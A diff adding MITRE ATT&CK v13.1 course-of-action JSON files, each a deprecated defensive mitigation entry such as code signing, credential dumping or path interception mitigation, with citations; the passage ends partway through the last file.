a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--82fbc58b-171d-4a2d-9a20-c6b2a716bd08.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--82fbc58b-171d-4a2d-9a20-c6b2a716bd08.json new file mode 100644 index 0000000000000000000000000000000000000000..1b9250689998ee47fa067d003bb1d55e98721e0f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--82fbc58b-171d-4a2d-9a20-c6b2a716bd08.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--83499b19-9080-449c-b057-f472ce795524", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--82fbc58b-171d-4a2d-9a20-c6b2a716bd08", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1116", + "url": "https://attack.mitre.org/mitigations/T1116", + "source_name": "mitre-attack" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "TechNet Trusted Publishers", + "description": "Microsoft. (n.d.). Manage Trusted Publishers. Retrieved March 31, 2016.", + "url": "https://technet.microsoft.com/en-us/library/cc733026.aspx" + }, + { + "source_name": "Securelist Digital Certificates", + "description": "Ladikov, A. (2015, January 29). Why You Shouldn\u2019t Completely Trust Files Signed with Digital Certificates. Retrieved March 31, 2016.", + "url": "https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/" + } + ], + "modified": "2020-01-17T16:45:23.319Z", + "name": "Code Signing Mitigation", + "description": "Process whitelisting and trusted publishers to verify authenticity of software can help prevent signed malicious or untrusted code from executing on a system. (Citation: NSA MS AppLocker) (Citation: TechNet Trusted Publishers) (Citation: Securelist Digital Certificates)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--902286b2-96cc-4dd7-931f-e7340c9961da.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--902286b2-96cc-4dd7-931f-e7340c9961da.json new file mode 100644 index 0000000000000000000000000000000000000000..082b7d44970b081083c0acc49d31f49074dbb947 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--902286b2-96cc-4dd7-931f-e7340c9961da.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--af7c2ee7-0415-49ea-b636-f04db698ab84", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--902286b2-96cc-4dd7-931f-e7340c9961da", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1006", + "url": "https://attack.mitre.org/mitigations/T1006", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2021-08-23T20:25:19.208Z", + "name": "File System Logical Offsets Mitigation", + "description": "Identify potentially malicious software that may be used to access logical drives in this manner, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--94927849-03e3-4a07-8f4c-9ee21b626719.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--94927849-03e3-4a07-8f4c-9ee21b626719.json new file mode 100644 index 0000000000000000000000000000000000000000..18c86380285cc8037c87e2f086fd219446a1a3f2 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--94927849-03e3-4a07-8f4c-9ee21b626719.json @@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--e9fa4da9-3fa6-45c6-8408-730e85641b06", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--94927849-03e3-4a07-8f4c-9ee21b626719", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1165", + "external_id": "T1165" + } + ], + "modified": "2019-07-25T12:01:55.766Z", + "name": "Startup Items Mitigation", + "description": "Since StartupItems are deprecated, preventing all users from writing to the /Library/StartupItems directory would prevent any startup items from getting registered. Similarly, appropriate permissions should be applied such that only specific users can edit the startup items so that they can\u2019t be leveraged for privilege escalation.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--9a902722-cecd-4fbe-a6c9-49333aa0f8c2.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--9a902722-cecd-4fbe-a6c9-49333aa0f8c2.json new file mode 100644 index 0000000000000000000000000000000000000000..514c43287b0e2e8cd1052dbc0fd3cee1f9a22d8a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--9a902722-cecd-4fbe-a6c9-49333aa0f8c2.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--087fdd0d-a5a1-4ed3-90b4-9a101c9f6aa2", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--9a902722-cecd-4fbe-a6c9-49333aa0f8c2", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1018", + "url": "https://attack.mitre.org/mitigations/T1018", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2020-01-17T16:45:23.921Z", + "name": "Remote System Discovery Mitigation", + "description": "Identify unnecessary system utilities or potentially malicious software that may be used to acquire information on remotely available systems, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--a569295c-a093-4db4-9fb4-7105edef85ad.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--a569295c-a093-4db4-9fb4-7105edef85ad.json new file mode 100644 index 0000000000000000000000000000000000000000..4af6c1d6bbfcf4f33ba8d5c1430de76fb7d0f941 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--a569295c-a093-4db4-9fb4-7105edef85ad.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--23a9f62d-3cf0-4fd8-a052-c6379050eae9", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--a569295c-a093-4db4-9fb4-7105edef85ad", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1024", + "external_id": "T1024" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "modified": "2019-07-24T18:14:14.227Z", + "name": "Custom Cryptographic Protocol Mitigation", + "description": "Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Since the custom protocol used may not adhere to typical protocol standards, there may be opportunities to signature the traffic on a network level for detection. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--aeff5887-8f9e-48d5-a523-9b395e2ce80a.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--aeff5887-8f9e-48d5-a523-9b395e2ce80a.json new file mode 100644 index 0000000000000000000000000000000000000000..c8e22bc4e0fe77ffbc82593fb9c7102684bcfbbe --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--aeff5887-8f9e-48d5-a523-9b395e2ce80a.json @@ -0,0 +1,92 @@ +{ + "type": "bundle", + "id": "bundle--3303ebe6-46aa-48fa-93e9-09193a6946a7", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--aeff5887-8f9e-48d5-a523-9b395e2ce80a", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1003", + "url": "https://attack.mitre.org/mitigations/T1003", + "source_name": "mitre-attack" + }, + { + "url": "https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material#a-nameesaebmaesae-administrative-forest-design-approach", + "description": "Plett, C., Poggemeyer, L. (12, October 26). Securing Privileged Access Reference Material. Retrieved April 25, 2017.", + "source_name": "Microsoft Securing Privileged Access" + }, + { + "source_name": "Microsoft LSA", + "description": "Microsoft. (2013, July 31). Configuring Additional LSA Protection. Retrieved February 13, 2015.", + "url": "https://technet.microsoft.com/en-us/library/dn408187.aspx" + }, + { + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "source_name": "Beechey 2010" + }, + { + "url": "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "source_name": "Corio 2008" + }, + { + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.", + "source_name": "TechNet Applocker vs SRP" + }, + { + "source_name": "TechNet Credential Guard", + "description": "Lich, B. (2016, May 31). Protect derived domain credentials with Credential Guard. Retrieved June 1, 2016.", + "url": "https://technet.microsoft.com/en-us/itpro/windows/keep-secure/credential-guard" + }, + { + "source_name": "GitHub SHB Credential Guard", + "description": "NSA IAD. (2017, April 20). Secure Host Baseline - Credential Guard. Retrieved April 25, 2017.", + "url": "https://github.com/iadgov/Secure-Host-Baseline/tree/master/Credential%20Guard" + }, + { + "url": "https://adsecurity.org/?p=1729", + "description": "Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation, and Detection. Retrieved December 4, 2017.", + "source_name": "AdSecurity DCSync Sept 2015" + }, + { + "source_name": "Microsoft Replication ACL", + "description": "Microsoft. (n.d.). How to grant the \"Replicating Directory Changes\" permission for the Microsoft Metadirectory Services ADMA service account. Retrieved December 4, 2017.", + "url": "https://support.microsoft.com/help/303972/how-to-grant-the-replicating-directory-changes-permission-for-the-micr" + }, + { + "source_name": "Microsoft Disable NTLM Nov 2012", + "description": "Microsoft. (2012, November 29). Using security policies to restrict NTLM traffic. Retrieved December 4, 2017.", + "url": "https://technet.microsoft.com/library/jj865668.aspx" + } + ], + "modified": "2021-08-23T20:25:19.916Z", + "name": "Credential Dumping Mitigation", + "description": "### Windows\nMonitor/harden access to LSASS and SAM table with tools that allow process whitelisting. Limit credential overlap across systems to prevent lateral movement opportunities using [Valid Accounts](https://attack.mitre.org/techniques/T1078) if passwords and hashes are obtained. Ensure that local administrator accounts have complex, unique passwords across all systems on the network. Do not put user or admin domain accounts in the local administrator groups across systems unless they are tightly controlled, as this is often equivalent to having a local administrator account with the same password on all systems. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers. (Citation: Microsoft Securing Privileged Access)\n\nOn Windows 8.1 and Windows Server 2012 R2, enable Protected Process Light for LSA. (Citation: Microsoft LSA)\n\nIdentify and block potentially malicious software that may be used to dump credentials by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)\n\nWith Windows 10, Microsoft implemented new protections called Credential Guard to protect the LSA secrets that can be used to obtain credentials through forms of credential dumping. It is not configured by default and has hardware and firmware system requirements. (Citation: TechNet Credential Guard) It also does not protect against all forms of credential dumping. (Citation: GitHub SHB Credential Guard)\n\nManage the access control list for \u201cReplicating Directory Changes\u201d and other permissions associated with domain controller replication. (Citation: AdSecurity DCSync Sept 2015) (Citation: Microsoft Replication ACL)\n\nConsider disabling or restricting NTLM traffic. (Citation: Microsoft Disable NTLM Nov 2012)\n\n### Linux\nScraping the passwords from memory requires root privileges. Follow best practices in restricting access to escalated privileges to avoid hostile programs from accessing such sensitive regions of memory.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--ba06d68a-4891-4eb5-b634-152e05ec60ee.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--ba06d68a-4891-4eb5-b634-152e05ec60ee.json new file mode 100644 index 0000000000000000000000000000000000000000..296bbf54a9b1ec75bcb2a94fcfaa22d33a6792de --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--ba06d68a-4891-4eb5-b634-152e05ec60ee.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--277a1bde-8b1a-430d-b593-75fac11e949a", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--ba06d68a-4891-4eb5-b634-152e05ec60ee", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1030", + "external_id": "T1030" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "modified": "2019-07-24T19:05:56.488Z", + "name": "Data Transfer Size Limits Mitigation", + "description": "Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary command and control infrastructure and malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool command and control signatures over time or construct protocols in such a way to avoid detection by common defensive tools. (Citation: University of Birmingham C2)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--c61e2da1-f51f-424c-b152-dc930d4f2e70.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--c61e2da1-f51f-424c-b152-dc930d4f2e70.json new file mode 100644 index 0000000000000000000000000000000000000000..2c288fe316f3b3a59658676ec943987e78a48d30 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--c61e2da1-f51f-424c-b152-dc930d4f2e70.json @@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--1796ca61-5106-485c-821f-51fcd0499dcb", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--c61e2da1-f51f-424c-b152-dc930d4f2e70", + "type": "course-of-action", + "created": "2019-02-01T14:35:39.565Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1480", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1480" + } + ], + "modified": "2019-07-24T19:17:09.258Z", + "name": "Environmental Keying Mitigation", + "description": "This technique likely should not be mitigated with preventative controls because it may protect unintended targets from being compromised. If targeted, efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior if compromised.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--cdecc44a-1dbf-4c1f-881c-f21e3f47272a.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--cdecc44a-1dbf-4c1f-881c-f21e3f47272a.json new file mode 100644 index 0000000000000000000000000000000000000000..6ed596e83dd1ffbbea8b19e546262b1b255b8cfc --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--cdecc44a-1dbf-4c1f-881c-f21e3f47272a.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--37e63923-06c8-41f0-9cd8-ac5bfdf24684", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--cdecc44a-1dbf-4c1f-881c-f21e3f47272a", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1105", + "external_id": "T1105" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "modified": "2019-07-25T11:33:35.477Z", + "name": "Remote File Copy Mitigation", + "description": "Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware or unusual data transfer over known tools and protocols like FTP can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--d4fd04e0-d1a4-4b5a-a5bb-16683cdbcce2.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--d4fd04e0-d1a4-4b5a-a5bb-16683cdbcce2.json new file mode 100644 index 0000000000000000000000000000000000000000..b6c6240ae6303ae53009c5cbd2ef833c4dc0739c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--d4fd04e0-d1a4-4b5a-a5bb-16683cdbcce2.json @@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--2e4ebba4-fc07-435e-aa02-8372dd30f734", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--d4fd04e0-d1a4-4b5a-a5bb-16683cdbcce2", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1133", + "external_id": "T1133" + } + ], + "modified": "2019-07-24T19:27:15.659Z", + "name": "External Remote Services Mitigation", + "description": "Limit access to remote services through centrally managed concentrators such as VPNs and other managed remote access systems. Deny direct remote access to internal systems through the use of network proxies, gateways, and firewalls. Disable or block remotely available services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1028). Use strong two-factor or multi-factor authentication for remote service accounts to mitigate an adversary's ability to leverage stolen credentials, but be aware of [Multi-Factor Authentication Interception](https://attack.mitre.org/techniques/T1111) techniques for some two-factor authentication implementations.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--e0703d4f-3972-424a-8277-84004817e024.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--e0703d4f-3972-424a-8277-84004817e024.json new file mode 100644 index 0000000000000000000000000000000000000000..4782b0b70795fc323817841e9becc73882547ad2 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--e0703d4f-3972-424a-8277-84004817e024.json @@ -0,0 +1,67 @@ +{ + "type": "bundle", + "id": "bundle--8cba1c08-538f-4075-969c-30004224e47c", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--e0703d4f-3972-424a-8277-84004817e024", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1034", + "url": "https://attack.mitre.org/mitigations/T1034", + "source_name": "mitre-attack" + }, + { + "url": "http://msdn.microsoft.com/en-us/library/ms682425", + "description": "Microsoft. (n.d.). CreateProcess function. Retrieved December 5, 2014.", + "source_name": "Microsoft CreateProcess" + }, + { + "source_name": "MSDN DLL Security", + "description": "Microsoft. (n.d.). Dynamic-Link Library Security. Retrieved July 25, 2016.", + "url": "https://msdn.microsoft.com/en-us/library/ff919712.aspx" + }, + { + "source_name": "Kanthak Sentinel", + "description": "Kanthak, S. (2016, July 20). Vulnerability and Exploit Detector. Retrieved February 3, 2017.", + "url": "https://skanthak.homepage.t-online.de/sentinel.html" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + } + ], + "modified": "2021-08-23T20:25:19.363Z", + "name": "Path Interception Mitigation", + "description": "Eliminate path interception weaknesses in program configuration files, scripts, the PATH environment variable, services, and in shortcuts by surrounding PATH variables with quotation marks when functions allow for them (Citation: Microsoft CreateProcess). Be aware of the search order Windows uses for executing or loading binaries and use fully qualified paths wherever appropriate (Citation: MSDN DLL Security). Clean up old Windows Registry keys when software is uninstalled to avoid keys with no associated legitimate binaries.\n\nPeriodically search for and correct or report path interception weaknesses on systems that may have been introduced using custom or available tools that report software using insecure path configurations (Citation: Kanthak Sentinel). \n\nRequire that all executables be placed in write-protected directories. Ensure that proper permissions and directory access control are set to deny users the ability to write files to the top-level directory C: and system directories, such as C:\\Windows\\, to reduce places where malicious files could be placed for execution.\n\nIdentify and block potentially malicious software that may be executed through the path interception by using whitelisting (Citation: Beechey 2010) tools, like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies, (Citation: Corio 2008) that are capable of auditing and/or blocking unknown executables.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": 